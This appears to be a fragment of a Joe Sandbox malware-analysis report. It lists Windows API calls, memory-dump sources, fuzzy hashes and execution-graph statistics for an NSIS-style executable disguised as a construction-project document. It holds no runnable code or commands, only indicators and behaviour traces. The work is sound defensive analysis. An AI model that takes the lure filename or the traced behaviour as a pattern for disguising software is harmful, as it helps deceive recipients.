                                                                                                                          Similarity
                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1849352358-0
                                                                                                                          • Opcode ID: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                                                                                          • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                                                                                          • Opcode Fuzzy Hash: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                                                                                          • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(?), ref: 00401D44
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                                          • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3808545654-0
                                                                                                                          • Opcode ID: 3d10640cf75f264bc6b4d99a4bec16fe66d8b8c39a1604d1ba5a7bd99958a89c
                                                                                                                          • Instruction ID: 8995593179462595128303b368e9330df260c28bd2cead9704070f65c6b7920e
                                                                                                                          • Opcode Fuzzy Hash: 3d10640cf75f264bc6b4d99a4bec16fe66d8b8c39a1604d1ba5a7bd99958a89c
                                                                                                                          • Instruction Fuzzy Hash: 1F016D71948285EFEB416BB0AE0AFDABF74EB65305F144479F201B62E2C77C10058B6E
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 332B536F
                                                                                                                            • Part of subcall function 332B571E: HeapFree.KERNEL32(00000000,00000000,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?), ref: 332B5734
                                                                                                                            • Part of subcall function 332B571E: GetLastError.KERNEL32(?,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?,?), ref: 332B5746
                                                                                                                          • _free.LIBCMT ref: 332B5381
                                                                                                                          • _free.LIBCMT ref: 332B5394
                                                                                                                          • _free.LIBCMT ref: 332B53A5
                                                                                                                          • _free.LIBCMT ref: 332B53B6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,?), ref: 332B4C1D
                                                                                                                          • _free.LIBCMT ref: 332B4CE8
                                                                                                                          • _free.LIBCMT ref: 332B4CF2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                          • String ID: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                          • API String ID: 2506810119-3394933079
                                                                                                                          APIs
                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                          • String ID: !
                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,332B6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 332B8731
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 332B87BA
                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 332B87CC
                                                                                                                          • __freea.LIBCMT ref: 332B87D5
                                                                                                                            • Part of subcall function 332B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 332B5702
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2652629310-0
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                                                                                            • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,?,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                                          • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,?,00000000,00000000,?,?), ref: 0040327F
                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,?,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Pointer$CountTickWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2146148272-0
                                                                                                                          APIs
                                                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                                          • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1356686001-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(?,?,00424EF0,?,00405AF6,00424EF0,00424EF0,00436800,?,74DF2EE0,00405834,?,00436800,74DF2EE0,00434000), ref: 00405A90
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405A95
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405AAD
                                                                                                                          • CreateDirectoryW.KERNEL32(?,?,00000000,?,00000000,?), ref: 004015E3
                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015ED
                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,00000000,?,00000000,?), ref: 004015FD
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,?), ref: 00401630
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3751793516-0
                                                                                                                          APIs
                                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                                          • GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                            • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1404258612-0
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,332B1D66,00000000,00000000,?,332B5C88,332B1D66,00000000,00000000,00000000,?,332B5E85,00000006,FlsSetValue), ref: 332B5D13
                                                                                                                          • GetLastError.KERNEL32(?,332B5C88,332B1D66,00000000,00000000,00000000,?,332B5E85,00000006,FlsSetValue,332BE190,FlsSetValue,00000000,00000364,?,332B5BC8), ref: 332B5D1F
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,332B5C88,332B1D66,00000000,00000000,00000000,?,332B5E85,00000006,FlsSetValue,332BE190,FlsSetValue,00000000), ref: 332B5D2D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3177248105-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                            • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                                                                            • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                            • Part of subcall function 00405703: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                                                                                            • Part of subcall function 00405703: CloseHandle.KERNEL32(?), ref: 00405739
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E80
                                                                                                                          • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401E95
                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3585118688-0
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen
                                                                                                                          • String ID: : $Se.
                                                                                                                          • API String ID: 4218353326-4089948878
                                                                                                                          APIs
                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 332B2903
                                                                                                                            • Part of subcall function 332B35D2: RaiseException.KERNEL32(?,?,?,332B2925,00000000,00000000,00000000,?,?,?,?,?,332B2925,?,332C21B8), ref: 332B3632
                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 332B2920
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                          • String ID: Unknown exception
                                                                                                                          • API String ID: 3476068407-410509341
                                                                                                                          APIs
                                                                                                                          • IsWindowVisible.USER32(?), ref: 004051D7
                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405228
                                                                                                                            • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00405C45
                                                                                                                          • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C60
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                          • String ID: nsa
                                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                                          APIs
                                                                                                                          • GetOEMCP.KERNEL32(00000000,?,?,332B6C7C,?), ref: 332B6A1E
                                                                                                                          • GetACP.KERNEL32(00000000,?,?,332B6C7C,?), ref: 332B6A35
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: |l+3
                                                                                                                          • API String ID: 0-2294312451
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405739
                                                                                                                          Strings
                                                                                                                          • Error launching installer, xrefs: 00405716
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                          • String ID: Error launching installer
                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                                                                                          • lstrcmpiA.KERNEL32(00405D97,00000000), ref: 00405B85
                                                                                                                          • CharNextA.USER32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B96
                                                                                                                          • lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 190613189-0
                                                                                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                          • Instruction ID: 495cf0b23cfe7cb5471ae9193bfc392c37a901cc734ec181b4002dd8df2403ac
                                                                                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                          • Instruction Fuzzy Hash: 56F0CD32604458AFC7129FA8CD00D9EBBB8EF06250B2140AAF801F7221D634FE019BA9

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:6.2%
                                                                                                                          Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                          Signature Coverage:3.2%
                                                                                                                          Total number of Nodes:2000
                                                                                                                          Total number of Limit Nodes:67
